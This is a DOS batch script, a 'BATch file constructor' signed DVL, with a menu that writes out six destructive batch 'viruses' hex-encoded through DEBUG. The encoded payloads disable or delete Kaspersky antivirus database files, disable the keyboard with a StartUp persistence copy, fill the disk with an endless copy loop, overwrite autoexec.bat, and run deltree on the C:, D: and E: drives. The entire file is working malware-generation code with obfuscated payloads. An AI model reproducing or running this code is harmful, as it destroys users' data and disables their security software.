@echo off
:menu
echo                    ษอออ                               อออป
echo        Creator-DVL บ The Silly BATch file(s) constructor บ Version 1.0
echo        อออออออออออ ศอออ                               อออผ อออออออออออ
echo          It will easily create BATch files with dangerous commands
echo.
echo                     ษอออออออออออออออออออออออออออออออออออป
echo                     บ Viruses don't harm, ignorance do! บ
echo                     ศอออออออออออออออออออออออออออออออออออผ
echo.
echo    Choose your file (press a number):
echo    อออออออออออออออออออออออออออออออออ
echo.
echo.
echo    1 - Create the AntiKAV.a viruz
echo    2 - Create the AntiKAV.b viruz
echo    3 - Create the AntiKBD.a viruz
echo    4 - Create the LoopZ.a viruz
echo    5 - Create the LoopZ.b viruz
echo    6 - Create the VariableZ.a viruz
echo.
echo    Q - Quit
echo.
echo.
choice /c:123456Q>nul
if errorlevel 7 goto done
if errorlevel 6 goto 6
if errorlevel 5 goto 5
if errorlevel 4 goto 4
if errorlevel 3 goto 3
if errorlevel 2 goto 2
if errorlevel 1 goto 1
echo CHOICE missing
goto done

:1
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 41 6E 6F>>AntiKAV.a
@echo e 0110  74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69 6F>>AntiKAV.a
@echo e 0120  6E 0D 0A 40 61 74 74 72 69 62 20 43 3A 5C 50 52>>AntiKAV.a
@echo e 0130  4F 47 52 41 7E 31 5C 43 4F 4D 4D 4F 4E 7E 31 5C>>AntiKAV.a
@echo e 0140  41 56 50 53 48 41 7E 31 5C 41 56 50 42 41 53 45>>AntiKAV.a
@echo e 0150  53 5C 2A 2E 2A 20 2D 73 20 2D 68 20 2D 72 20 2B>>AntiKAV.a
@echo e 0160  61 0D 0A 40 72 65 6E 20 43 3A 5C 50 52 4F 47 52>>AntiKAV.a
@echo e 0170  41 7E 31 5C 43 4F 4D 4D 4F 4E 7E 31 5C 41 56 50>>AntiKAV.a
@echo e 0180  53 48 41 7E 31 5C 41 56 50 42 41 53 45 53 5C 61>>AntiKAV.a
@echo e 0190  76 70 30 2A 2A 2A 2E 61 76 63 20 64 76 6C 2E 30>>AntiKAV.a
@echo e 01A0  30 31 20 3E 6E 75 6C 0D 0A 40 72 65 6E 20 43 3A>>AntiKAV.a
@echo e 01B0  5C 50 52 4F 47 52 41 7E 31 5C 43 4F 4D 4D 4F 4E>>AntiKAV.a
@echo e 01C0  7E 31 5C 41 56 50 53 48 41 7E 31 5C 41 56 50 42>>AntiKAV.a
@echo e 01D0  41 53 45 53 5C 75 70 30 2A 2A 2A 2A 2A 2E 61 76>>AntiKAV.a
@echo e 01E0  63 20 64 76 6C 2E 30 30 32 20 3E 6E 75 6C 0D 0A>>AntiKAV.a
@echo e 01F0  40 72 65 6E 20 43 3A 5C 50 52 4F 47 52 41 7E 31>>AntiKAV.a
@echo e 0200  5C 43 4F 4D 4D 4F 4E 7E 31 5C 41 56 50 53 48 41>>AntiKAV.a
@echo e 0210  7E 31 5C 41 56 50 42 41 53 45 53 5C 64 61 69 6C>>AntiKAV.a
@echo e 0220  79 2E 61 76 63 20 64 76 6C 2E 30 30 33 20 3E 6E>>AntiKAV.a
@echo e 0230  75 6C 0D 0A 40 61 74 74 72 69 62 20 43 3A 5C 50>>AntiKAV.a
@echo e 0240  52 4F 47 52 41 7E 31 5C 43 4F 4D 4D 4F 4E 7E 31>>AntiKAV.a
@echo e 0250  5C 41 56 50 53 48 41 7E 31 5C 41 56 50 42 41 53>>AntiKAV.a
@echo e 0260  45 53 5C 2A 2E 30 30 2A 20 2B 73 20 2B 68 20 2B>>AntiKAV.a
@echo e 0270  72 20 2B 61 0D 0A 3A 3A 64 76 6C 32 30 30 33 72>>AntiKAV.a
@echo e 0280  6F 40 79 61 68 6F 6F 2E 63 6F 2E 75 6B 0D 0A 63>>AntiKAV.a
@echo e 0290  6C 73 00>>AntiKAV.a
@echo rcx>>AntiKAV.a
@echo 192>>AntiKAV.a
@echo n bat>>AntiKAV.a
@echo w>>AntiKAV.a
@echo q>>AntiKAV.a
@debug<AntiKAV.a
@ren bat AntiKAV.a.bat
@deltree/y bat >nul
@deltree/y AntiKAV.a >nul
ctty con
goto done

:2
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 41 6E 6F>>AntiKAV.b
@echo e 0110  74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69 6F>>AntiKAV.b
@echo e 0120  6E 0D 0A 40 61 74 74 72 69 62 20 43 3A 5C 50 52>>AntiKAV.b
@echo e 0130  4F 47 52 41 7E 31 5C 43 4F 4D 4D 4F 4E 7E 31 5C>>AntiKAV.b
@echo e 0140  41 56 50 53 48 41 7E 31 5C 41 56 50 42 41 53 45>>AntiKAV.b
@echo e 0150  53 5C 2A 2E 2A 20 2D 73 20 2D 68 20 2D 72 20 2B>>AntiKAV.b
@echo e 0160  61 0D 0A 40 6D 64 20 63 3A 5C 72 65 63 79 63 6C>>AntiKAV.b
@echo e 0170  65 64 5C F0 FC C5 20 3E 6E 75 6C 0D 0A 40 6D 6F>>AntiKAV.b
@echo e 0180  76 65 20 43 3A 5C 50 52 4F 47 52 41 7E 31 5C 43>>AntiKAV.b
@echo e 0190  4F 4D 4D 4F 4E 7E 31 5C 41 56 50 53 48 41 7E 31>>AntiKAV.b
@echo e 01A0  5C 41 56 50 42 41 53 45 53 5C 2A 2E 2A 20 63 3A>>AntiKAV.b
@echo e 01B0  5C 72 65 63 79 63 6C 65 64 5C F0 FC C5 20 3E 6E>>AntiKAV.b
@echo e 01C0  75 6C 0D 0A 40 64 65 6C 74 72 65 65 2F 79 20 63>>AntiKAV.b
@echo e 01D0  3A 5C 72 65 63 79 63 6C 65 64 5C F0 FC C5 20 3E>>AntiKAV.b
@echo e 01E0  6E 75 6C 0D 0A 3A 3A 64 76 6C 32 30 30 33 72 6F>>AntiKAV.b
@echo e 01F0  40 79 61 68 6F 6F 2E 63 6F 2E 75 6B 0D 0A 63 6C>>AntiKAV.b
@echo e 0200  73 00>>AntiKAV.b
@echo rcx>>AntiKAV.b
@echo 101>>AntiKAV.b
@echo n bat>>AntiKAV.b
@echo w>>AntiKAV.b
@echo q>>AntiKAV.b
@debug<AntiKAV.b
@ren bat AntiKAV.b.bat
@deltree/y bat >nul
@deltree/y AntiKAV.b >nul
ctty con
goto done

:3
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 41 6E 6F>>AntiKBD.a
@echo e 0110  74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69 6F>>AntiKBD.a
@echo e 0120  6E 0D 0A 40 63 3A 5C 77 69 6E 64 6F 77 73 5C 72>>AntiKBD.a
@echo e 0130  75 6E 64 6C 6C 33 32 2E 65 78 65 20 6B 65 79 62>>AntiKBD.a
@echo e 0140  6F 61 72 64 2C 64 69 73 61 62 6C 65 0D 0A 40 63>>AntiKBD.a
@echo e 0150  6F 70 79 20 25 30 20 43 3A 5C 57 49 4E 44 4F 57>>AntiKBD.a
@echo e 0160  53 5C 53 74 61 72 74 6D 7E 31 5C 50 72 6F 67 72>>AntiKBD.a
@echo e 0170  61 6D 73 5C 53 74 61 72 74 55 70 0D 0A 3A 3A 64>>AntiKBD.a
@echo e 0180  76 6C 32 30 30 33 72 6F 40 79 61 68 6F 6F 2E 63>>AntiKBD.a
@echo e 0190  6F 2E 75 6B 0D 0A 63 6C 73 00>>AntiKBD.a
@echo rcx>>AntiKBD.a
@echo 99>>AntiKBD.a
@echo n bat>>AntiKBD.a
@echo w>>AntiKBD.a
@echo q>>AntiKBD.a
@debug<AntiKBD.a
@ren bat AntiKBD.a.bat
@deltree/y bat >nul
@deltree/y AntiKBD.a >nul
ctty con
goto done

:4
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 20 41 6E>>loopZ.a
@echo e 0110  6F 74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69>>loopZ.a
@echo e 0120  6F 6E 0D 0A 63 74 74 79 20 6E 75 6C 0D 0A 63 6C>>loopZ.a
@echo e 0130  73 0D 0A 40 65 63 68 6F 20 30 31 30 31 30 31 30>>loopZ.a
@echo e 0140  31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30>>loopZ.a
@echo e 0150  31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30>>loopZ.a
@echo e 0160  31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30>>loopZ.a
@echo e 0170  31 30 31 30 31 30 31 30 31 30 31 30 31 30 31 30>>loopZ.a
@echo e 0180  31 30 31 30 31 30 31 30 3E 3E 64 76 6C 2E 64 76>>loopZ.a
@echo e 0190  6C 0D 0A 3A 64 76 6C 0D 0A 40 63 6F 70 79 20 64>>loopZ.a
@echo e 01A0  76 6C 2E 64 76 6C 20 6E 67 6C 2E 6E 67 6C 20 3E>>loopZ.a
@echo e 01B0  6E 75 6C 0D 0A 40 63 6F 70 79 20 64 76 6C 2E 64>>loopZ.a
@echo e 01C0  76 6C 2B 6E 67 6C 2E 6E 67 6C 20 3E 6E 75 6C 0D>>loopZ.a
@echo e 01D0  0A 67 6F 74 6F 20 64 76 6C 0D 0A 3A 3A 20 64 76>>loopZ.a
@echo e 01E0  6C 32 30 30 33 72 6F 40 79 61 68 6F 6F 2E 63 6F>>loopZ.a
@echo e 01F0  2E 75 6B 00>>loopZ.a
@echo rcx>>loopZ.a
@echo F3>>loopZ.a
@echo n bat>>loopZ.a
@echo w>>loopZ.a
@echo q>>loopZ.a
@debug<loopZ.a
@ren bat LoopZ.a.bat
@deltree/y bat >nul
@deltree/y loopZ.a >nul
ctty con
goto done

:5
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 41 6E 6F>>loopZ.b
@echo e 0110  74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69 6F>>loopZ.b
@echo e 0120  6E 0D 0A 40 65 63 68 6F 20 64 76 6C 2E 62 61 74>>loopZ.b
@echo e 0130  20 3E 20 63 3A 5C 61 75 74 6F 65 78 65 63 2E 62>>loopZ.b
@echo e 0140  61 74 0D 0A 40 65 63 68 6F 20 61 75 74 6F 65 78>>loopZ.b
@echo e 0150  65 63 2E 62 61 74 20 3E 20 63 3A 5C 64 76 6C 2E>>loopZ.b
@echo e 0160  62 61 74 0D 0A 3A 3A 64 76 6C 32 30 30 33 72 6F>>loopZ.b
@echo e 0170  40 79 61 68 6F 6F 2E 63 6F 2E 75 6B 0D 0A 63 6C>>loopZ.b
@echo e 0180  73 00>>loopZ.b
@echo rcx>>loopZ.b
@echo 81>>loopZ.b
@echo n bat>>loopZ.b
@echo w>>loopZ.b
@echo q>>loopZ.b
@debug<loopZ.b
@ren bat loopZ.b.bat
@deltree/y bat >nul
@deltree/y loopZ.b >nul
ctty con
goto done

:6
ctty nul
@echo e 0100  40 65 63 68 6F 20 6F 66 66 0D 0A 3A 3A 41 6E 6F>>variabZ.a
@echo e 0110  74 68 65 72 20 44 56 4C 20 63 72 65 61 74 69 6F>>variabZ.a
@echo e 0120  6E 0D 0A 40 66 6F 72 20 25 61 20 69 6E 20 28 65>>variabZ.a
@echo e 0130  3A 5C 29 20 64 6F 20 64 65 6C 74 72 65 65 2F 79>>variabZ.a
@echo e 0140  20 25 61 20 3E 6E 75 6C 0D 0A 40 66 6F 72 20 25>>variabZ.a
@echo e 0150  61 20 69 6E 20 28 64 3A 5C 29 20 64 6F 20 64 65>>variabZ.a
@echo e 0160  6C 74 72 65 65 2F 79 20 25 61 20 3E 6E 75 6C 0D>>variabZ.a
@echo e 0170  0A 40 66 6F 72 20 25 61 20 69 6E 20 28 63 3A 5C>>variabZ.a
@echo e 0180  29 20 64 6F 20 64 65 6C 74 72 65 65 2F 79 20 25>>variabZ.a
@echo e 0190  61 20 3E 6E 75 6C 0D 0A 63 6C 73 0D 0A 00>>variabZ.a
@echo rcx>>variabZ.a
@echo 9D>>variabZ.a
@echo n bat>>variabZ.a
@echo w>>variabZ.a
@echo q>>variabZ.a
@debug<variabZ.a
@ren bat variabZ.a.bat
@deltree/y bat >nul
@deltree/y variabZ.a >nul
ctty con
goto done

:done
cls